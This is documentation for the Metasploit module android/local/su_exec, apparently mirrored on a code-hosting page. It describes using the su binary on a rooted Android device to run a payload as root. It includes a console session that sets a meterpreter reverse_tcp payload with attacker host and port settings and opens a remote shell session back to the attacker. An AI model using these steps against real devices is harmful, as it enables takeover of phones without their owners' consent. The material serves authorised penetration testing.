CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/android/local/su_exec.md
Views: 1904

Vulnerable Application

This module uses the su binary present on rooted devices to run a payload as root.

A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a temporary directory, make it executable, execute it in the background, and finally delete the executable.

On most devices the su binary will pop-up a prompt on the device asking the user for permission.

This module will only work on rooted devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data. Many devices can be rooted by flashing new firmware, however the existing data will be lost.

Scenarios

You'll first need to obtain a session on the target device. To do this follow the instructions here

Once the module is loaded, one simply needs to set the SESSION option and configure the handler. An example session follows:

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information         Connection
  --  ----  ----                        -----------         ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf5 exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf5 exploit(android/local/su_exec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.

Please not that in most cases you will have to manually confirm the Superuser prompt on the device itself before the module completes. You can do set WfsDelay 10 to give yourself more time.